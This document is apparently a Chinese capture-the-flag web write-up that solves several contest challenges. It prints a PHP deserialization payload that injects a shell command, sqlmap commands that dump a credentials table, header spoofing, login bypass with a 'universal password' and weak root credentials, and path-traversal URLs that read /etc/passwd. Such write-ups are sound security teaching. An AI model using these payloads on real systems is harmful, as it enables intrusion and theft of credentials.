合天御宅战疫-web-wp

合天御宅战疫-web-wp

签到

如图所示

mark

改成key{XXXX}提交

脑袋有点大

用bp抓包,在响应中找到key

mark

mark

统一登录

打开界面,要登陆,登录不上,用dirmap扫一下目录

mark

找到源码泄露,下载下来

代码审计

在common文件夹下找到home.php,wakeup函数有一个waf过滤,最下方的

1
2
$a=@$_POST['a'];
@unserialize($a);

可以想到构造反序列化对象,直接执行我们构造的对象,利用system函数,home后面的数字大于2可以绕过wakeup函数从而绕过过滤

构造payload

1
a=O:4:"home":3:{s:12:"%00home%00method";s:4:"ping";s:10:"%00home%00args";a:1:{i:0;s:26:"127.0.0.1;cat /opt/key.txt";}}

mark

后台key

mark

存在数字型sql注入

用sqlmap跑一下

爆库

1
sqlmap -u "http://118.190.100.227:5001/?r=content&cid=1"  -p "cid" --dbs

mark

爆表

1
sqlmap -u "http://118.190.100.227:5001/?r=content&cid=1"  -p "cid" -D seacms --tables

mark

爆字段

1
sqlmap -u "http://118.190.100.227:5001/?r=content&cid=1"  -p "cid" -D seacms -T manage --columns

mark

爆内容

1
sqlmap -u "http://118.190.100.227:5001/?r=content&cid=1"  -p "cid" -D seacms -T manage -C user,password --dump

mark

mark

得到用户名和密码后,由于密码MD5加密了,所以用md5解密一下,得到密码登录系统,根据提示找到key

mark

后台登录

mark

打开发现静止访问,但是响应码为200说明可能因为是后台登录系统做了限制,改xff头后顺利访问

mark

使用万能密码登录,成功获取key

mark

mark

phpmyadmin

mark

根目录下面的robots.txt指明了key的位置

通过增加常用文件名phpmyadmin,成功找到登录地址

用弱口令root/root登录后,先尝试包含/etc/passwd判断目录层级

1
http://114.215.40.251:5002/phpmyadmin/index.php?a=phpinfo();&target=export.php%253f/../../../../../etc/passwd

mark

然后再去包含key

1
http://114.215.40.251:5002/phpmyadmin/index.php?a=phpinfo();&target=export.php%253f/../../../../../opt/key.txt

mark